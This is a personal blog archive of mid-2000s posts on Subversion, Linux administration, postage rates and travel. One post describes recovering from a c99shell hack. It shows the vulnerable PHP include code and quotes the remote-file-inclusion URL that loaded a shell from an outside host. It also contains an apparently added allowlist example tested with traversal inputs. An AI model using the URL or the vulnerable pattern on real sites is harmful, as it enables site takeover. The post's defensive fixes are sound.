Small Gotcha When Copying Paths With Subversion

I was trying to do an svn copy from a specific server path into a local working copy. I basically wanted to copy over the vanilla mediawiki-1.8.1 sources from my repository into a local directory (called trunk). Here is what I did:

svn copy svn+ssh://david@server/svn/repos/Projects/wiki/mediawiki/1.8.1 ./trunk

You would think that this would copy the contents of the 1.8.1 directory into the trunk directory. Wrong; it copies the 1.8.1 directory and its contents into the trunk directory, thus creating a 1.8.1 directory inside trunk. It took me forever to figure out why it was doing this instead of what I wanted it to do (which is to copy the contents of 1.8.1, not the 1.8.1 directory itself).

The problem was that the trunk directory already existed. If I removed the trunk directory, then it creates the trunk directory and copies the contents of the 1.8.1 directory into trunk.

In case anyone is curious, what I am doing is following the instructions from the svn book on how to maintain vendor branches.

I Think I Fixed the c99shell Exploit on my Site

So one of my sites was hacked over the weekend. Apparently I was hacked using a c99shell. I think I figured out how they did it, and I think I found a solution to the problem for now.

I had the following code in my index.php script:

<?php
if ($page)
        include($page.'.php');
else
        include('main.php');
?>

So you can go to a URL like http://www.willmusic.ca/index.php?p=tunes and it will load the contents of tunes.php, for example. The whole reason for doing that is that the table of contents and header code is all in one place and the information in the main part of the pages comes from different files. These files are php files because sometimes they have some logic coded in them as well.

But the hackers were also able to go to URLs like this: http://www.willmusic.ca/index.php?p=http://membres.lycos.fr/shaunc99/she...? and access a "c-shell".

c99shell screenshot

Here is a screenshot of what it looked like. It basically gives them control over the entire site to do whatever they want with it. I am just glad they did not delete anything.

So I changed my index.php script to do this instead:

<?php
if (($page) && in_array($page, $pages))
        include($page.'.php');
else
        include('main.php');
?>

where $pages is a list of the pages on the site. The $pages array already existed, so I should have done this before.

I made this even more secure, following some advice that was given to me by one of the site5 support people. He told me that the above code could still be exploited if register_globals was enabled (which it isn't right now) and someone overwrote the $pages variable. So here's the even more secure version:

<?php
if ($page) {
        $location = $pages[$page];
        if ($location != "")
                include($location);
        else
                include('main.php');
}
else
        include('main.php');
?>

where $pages is an associative array that maps the ?p= argument (key) to a page (value) that it is allowed to open. This way, I am specifying explicitly what pages can be included with the include command.
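An added example (not the site's own index.php) that packages the allowlist approach of the last snippet as a function and exercises it against constructed ?p= values; the page names and sample inputs are made up here, and isset() replaces the != "" test so that unknown keys and non-string values fall through to main.php without a notice.

```php
<?php
// Added example, not the original site's index.php: the allowlist dispatch
// from the last snippet above, as a function that can be run from the
// command line. Page names and sample inputs here are constructed.

// The ?p= value is only ever used as a lookup key. The path handed to
// include() always comes from this array, never from the request.
$pages = array(
    'main'  => 'main.php',
    'tunes' => 'tunes.php',
    'shows' => 'shows.php',
);

/**
 * Map the raw ?p= value to a file the site is allowed to include.
 * Anything not in the allowlist (a remote URL, a traversal string, an
 * array from ?p[]=x, an empty value) resolves to the default page.
 */
function resolve_page($raw, array $pages, $default = 'main.php')
{
    // is_string() first: a non-string request value must not be cast or
    // used as an array offset; isset() avoids a notice on unknown keys.
    if (!is_string($raw) || !isset($pages[$raw])) {
        return $default;
    }
    return $pages[$raw];
}

// In index.php the dispatch would be:
//   include(resolve_page(isset($_GET['p']) ? $_GET['p'] : null, $pages));

// Constructed inputs, including the shape of the attack URL described above.
$samples = array(
    'tunes',
    'http://example.invalid/shell.txt?',
    '../../etc/passwd',
    array('x'),
    '',
);
foreach ($samples as $s) {
    printf("%-40s -> %s\n", json_encode($s, JSON_UNESCAPED_SLASHES), resolve_page($s, $pages));
}
```

Only 'tunes' and 'shows' resolve to their files; every other sample resolves to main.php.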

My Site Got Hacked

So I go away for the Thanksgiving weekend and come home to find out my site has been hacked. The attack consisted of setting up some elaborate phishing attacks for multiple Canadian and US banks. The main damage was done at a site that I maintain for some friends of mine, namely, Will Stroet's site. It is in a subdirectory of this site, set up with a domain pointer. I had ftp access enabled to the willmusic.ca directory ONLY and so I had assumed that the attackers had come in that way, through FTP. Then I noticed 3 files in my drupal modules/month directory. That got me really worried that there is some sort of security hole in Drupal or that my SSH credentials had been compromised in some way, because there is no FTP access to that directory (or at least there shouldn't be).

So far I have changed email passwords for the 2 email addresses set up through my hosting company site5 and changed the FTP password. Next, I am going to change my Drupal passwords and ssh password.

The good news is that I haven't lost any data as far as I know. One file was overwritten but it was easily recovered from an old backup (it was a template file that hadn't changed since the last backup anyways).

Cuban Nuclear Power Plant

While on vacation in Cuba in June and July 2006, we rented a moped for the day and went for a drive from Cienfuegos to Rancho Luna, crossed on the ferry to Castillo de Jagua, and then took the long road back to Cienfuegos. Along the way we spotted something very interesting in the middle of nowhere, located near the coast somewhere not too far west of Castillo de Jagua near Cienfuegos.

[flickr-photo:id=206375906]

We snapped this photo as we were going by on a little scooter/moped. Actually I think we stopped to take this picture because it looked so interesting. There was literally nothing for miles in either direction of this thing. I had assumed it was a nuclear power plant, but the idea seemed far-fetched to me and I then assumed it was some sort of chemical plant or perhaps a water desalination plant or something. There are some chemical factories in Cienfuegos so that seemed most plausible.

I finally did a little research and managed to find some information about it here:

The construction of an atomic power plant, started with Soviet aid in 1982, has been abandoned for ecological reasons, amongst others. The project - 75% of the construction and 20% of the equipment being finished - can be seen across the bay in the southwest.

(Once again nuclear gets a bad rap for being un-"ecological" even though it is one of the cleanest sources of power around.)

This could very well be the structure they are talking about as it is located south-west of the city, although I doubt that it is visible across the bay, but I could be wrong. I found further evidence here that actually has some pictures, and what I photographed is definitely the same thing as what is shown there. Another link here is heavy on US propaganda. It's too bad; if it weren't for Chernobyl (and the United States' meddling), the Cubans might actually have a nuclear power plant.

Canada Post Rates Rant


So I have this book that I was going to ship to Toronto. Here are the specifications:

Weight: 300 grams
Length: 210 mm
Width: 135 mm
Height: 25 mm

Shipping from Vancouver to Toronto via Canada Post Regular Parcel is $10.34 with a delivery standard of 5-10 business days. I thought that was grossly expensive for a very light, average-sized paperback novel. So I checked some other quotes:

  • Shipping from Vancouver to Florida via "Small Packet USA Surface" is only $6.65 with a delivery standard of 6-12 business days. It is both cheaper and barely slower than Canada Post's Regular Parcel service.
  • Shipping from Vancouver to Florida via "Small Packet USA Air" is only $7.90 with a delivery standard of 6-12 business days. It is both cheaper and barely slower than Canada Post's Regular Parcel service. I would expect that this Air Mail would be closer to 6 days and the surface would be closer to 12.
  • With FedEx Ground from Vancouver to Toronto it costs only $12.48 with a 4-day delivery standard (note: with a FedEx account it would be even cheaper). Only slightly cheaper than Canada Post's Regular Parcel, and a far better delivery guarantee.

Trim the package down a bit, to a height of just 20mm (instead of 25mm) and a weight of about 250g (instead of 300g), about the size of another book I have here with me, and the price becomes only $2.49 from Vancouver to Toronto with Canada Post Lettermail and $2.99 to the US with Canada Post US Lettermail or $3.96 to the US with Canada Post US Light Packet. The prices suddenly change drastically even though the weight has barely changed.

Here are my observations:

  • Why is shipping to Florida cheaper than shipping to Toronto? I don't see how that can ever make sense, unless of course it crosses the border in Vancouver quickly and gets handed off to USPS and they are far cheaper than Canada Post. I wouldn't be surprised as I have read that USPS is much cheaper. Is Canada Post justified in having rates higher than USPS? If they are sending the package by truck, it could be more costly to drive to Toronto than to drive to Florida. Unless of course they drove to Toronto via the US :-)
  • Why is FedEx Ground with a 4-day delivery only 21% more expensive than Canada Post's 5-10 business day standard? Either FedEx Ground is highly efficient, or they are not charging enough, or Canada Post is highly inefficient or charging too much.
  • Why does reducing the package's volume by 20% and the weight by 17% lead to a 76% reduction in price? This does not make sense at all. Normally you would expect a letter and a small parcel to both have some fixed cost associated with the handling that needs to be done. So let's assume a fixed cost of $0.10 for the letter and $0.10 for a parcel. Let's say the letter weighs 0.1 kg and a small parcel weighs 1 kg. There should be some variable cost to send the package that is proportional to the weight to transport it. Let's say $1/kg. So the letter's variable cost is $0.10 and the parcel's variable cost is $1. So the letter costs a total of $0.20 and the parcel costs $1.10. The parcel weighs 900% more but it costs only 550% more. This makes sense, because of the fixed costs with each item. In my example, a package weight increase of 20% led to a cost increase of 315%. Doesn't make any sense to me. Either the letter is costing them more to ship than they are charging or they are overcharging for the 300g parcel.
  • I find it interesting that it is cheaper to send a 300g, 25mm book to the US than it is to ship to Canada, but for a 250g, 20mm book it is the other way around.

I think what we need is something like the small packets service in Canada. We also need some consistency in the rates. There are so many oddities and contradictions in the rates, as I've pointed out above.

Vancouver Python User Group Talk on Python Web Frameworks (Django, Turbogears) - October 3, 2006

Vancouver's Python and Zope User Group will be having a talk on Python web frameworks, i.e. Django and Turbogears, at their upcoming meeting on October 3rd. I'm looking forward to learning about web frameworks in general a bit more and perhaps what differentiates them from each other and from Ruby on Rails.

Plastic Guns a Myth

A few nights ago we had some family over for dinner and we were talking about ridiculous airport security like the ban on liquids and such. I noted that it was possible to carry a plastic gun into an airport. Some had doubts that there were plastic guns, and I agreed, I could be wrong, but there are always plastic explosives :-) Anyways, I was dead wrong about the gun thing, but it turns out others were as well, when it came to the GLOCK 17. The GLOCK 17 has a plastic frame, and "early reports about the GLOCK incorrectly suggested that it was a wholly plastic gun, and so would not show up on metal detectors. In fact, the slide and the barrel and many other internal parts, comprising about 80% of the gun's mass, are made out of metal." Apparently no 100% plastic gun exists today. Plastic explosives do look easy enough to get on a plane, however, and detonate, and I'm not sure what anyone can do about that barring having bomb dogs sniff every passenger and bag. It does look like there are some solutions out there, including one designed at BC's own TRIUMF.

I'm probably going to get picked up tomorrow on terrorism charges under the anti-terrorism act. I just did a google search for plastic guns, plastic explosives, plastic knives with the words airport and security thrown in there. Oh well I'm sure others have searched for a lot worse.

Six of My Maui Photos Accepted to Schmap

I just found out today that six photos I took in Maui last October have been selected for inclusion in a Maui/Molokai travel guide made by Schmap. It's got to be a "Web 2.0" company with a name like "Schmap". I did not enter a contest or anything. I just took the pictures and posted them to Flickr and I guess they found them and liked them. Pretty cool eh? Here are the ones that have been selected. I hope some of them make it into the travel guide!
{{flickr:207816742}}
{{flickr:207812490}}
{{flickr:207812582}}
{{flickr:207813312}}
{{flickr:207813410}}
{{flickr:207813764}}

Awesome screen tips

Great GNU screen tips from Damien Krotkine. Modify your ~/.screenrc file as follows:

vbell on
defscrollback 5000
caption always "%{= kw}%-w%{= BW}%n %t%{-}%+w %-= @%H - %LD %d %LM - %c"

Now you get a cool console at the bottom. By the way, to change the title of a screen window, use CTRL-a followed by A (shift-a).

Insane Amount of Trackback Spam

Due to the insane amount of trackback spam I have been getting, I had to disable trackbacks altogether. As soon as the akismet drupal module supports trackbacks, I might be able to re-enable them. I really think trackbacks are a useful feature.

Starting sshd With a Higher Nice Value

I wanted sshd on my MythTV box to start with a lower priority than other processes. Sometimes I do large transfers to this box over scp (although usually I use nfs). I tried:

nice -n 10 /usr/sbin/sshd ${myopts} ${SSHD_OPTS}

and

start-stop-daemon -N 10 --stop --quiet --pidfile /var/run/${SVCNAME}.pid --signal HUP

in my /etc/init.d/sshd startup script (in Gentoo) but that didn't work. Even after restarting sshd and logging out and back in again (via ssh) there were still sshd processes running at nice level 0. I think it's because sshd likes to spawn itself at priority 0 (rather than the priority of the parent process, not sure if that is standard or not, but whatever).

The solution I came up with was to run this as a cron job:

ps -o pid -C sshd --no-heading | xargs renice 10

This renices all processes named sshd to nice level 10. This can actually be run by the normal user (if you only log in via ssh as normal user) because the processes that get nice level 0 seem to be processes created by the normal user that you log in as.

Stephen Colbert Bridge

Stephen Colbert won the bridge-naming contest. The conditions are that if he is dead and is fluent in Hungarian, the Northern M0 Danube bridge will be named after him, according to Hungarian law, but apparently that law could be changed.

Condi and Pete: who cares?

I can't believe the number of newspapers that published an article about Condoleezza Rice and Peter MacKay being an item or not being an item. I'm not sure who is stupider, the media, or the readers who clearly love to eat up their crap. Most likely it started by a bunch of bloggers joking around, posting pictures of the two holding hands, etc... and the mass media jumped on. Colbert sure ripped into the media last night on this issue, making fun of both the media for writing articles about how others were writing about it, and the gossip readers, by pretending to be one himself in his usual way.

ssmtp vs. postfix: no contest

Why ssmtp should be removed from gentoo:

  • ssmtp is no longer maintained upstream
  • Even its successor, bssmtp has been abandoned. The writer of bssmtp and maintainer of ssmtp said himself "I have now switched back to using Postfix on my laptop."

According to this page by the maintainer, the two advantages of ssmtp are:

  • it is light (doesn't matter if it's crap)
  • it is easy to configure (it appears that way at first, but it isn't necessarily so, if you check out the gentoo forums)

He continues by saying that it has loads of problems:

  • it doesn't fail in a nice way (this is huge, I was running into a problem with ssmtp not obeying the rules in /etc/ssmtp/revaliases; the output in syslog looked the same as a successful send, but the mail wasn't sent successfully and there is no debugging output or logging whatsoever. Compare that to postfix's excellent logging.)
  • it doesn't do local delivery
  • it doesn't queue messages.
  • there is no nice support for several network environments.

Let me recount my recent experiences. I wanted a simple outgoing mail server. Something that would allow me to run the following:

echo test |mail -s "test mail sent to external" me@gmail.com
echo test |mail -s "test mail sent to david" david
echo test |mail -s "test mail sent to root" root

and have all 3 messages sent to me@gmail.com. With ssmtp I never got this working after many, many hours of trying. In the end, the last two commands never worked; /etc/ssmtp/revaliases was not working for some reason. Maybe I goofed, but so what. Getting postfix to work was so damn easy. All I had to do with postfix was change relayhost in /etc/postfix/main.cf like so:

relayhost = smtp.vc.shawcable.net

and add a .forward file in the home directory of the root and david users, like so:

echo "me@gmail.com" > /root/.forward
echo "me@gmail.com" > /home/david/.forward

then,

/etc/init.d/postfix start
rc-update add postfix default

Presto! It all works! I am sure that there is an easy way to make local mail to all other users on my system get forwarded to gmail as well. Additionally, if I wanted to use gmail's smtp servers instead of shaw's I'm sure that would also be easy.

Let's look at ssmtp's setup for a bit.

In ssmtp.conf there is a "root=" option. There you can set "who gets all mail for userids less than 1000." The "mailhub=" option is simple enough and is like the relayhost option in postfix. The "hostname=" option is the strangest. You would think that it should be set to the hostname. According to many ssmtp howtos out there, it should be set to an email address. In this case I set it to my email address at shaw (which I don't use), again, according to many howtos. Then there is the revaliases file. In here you can re-route mail for local accounts to external email addresses. Too bad it doesn't work. Although it does work for some users apparently. The main thing I didn't like about ssmtp config files was the lack of documentation in them compared to postfix's. I definitely will never be returning to ssmtp now that everything works with postfix (and it only took 2 minutes to set up).

Backing up MySQL Databases With AutoMySQLBackup

I just discovered a very useful bash script tonight, AutoMySQLBackup. It is a nice and easy way to back up your mysql databases daily, weekly, and monthly. It was very easy to set up and works great. A great suggestion to avoid having to put the username and password of a database user with read/write access in the script is to do the following:

mysql -u root -p -e "GRANT SELECT, LOCK TABLES ON *.* TO 'backup'@'localhost' IDENTIFIED BY 'backupPW';"

That creates a database user called backup with password backupPW that has only SELECT and LOCK TABLES access to the databases. This tip came from this gentoo-wiki.com article on MySQL backup.
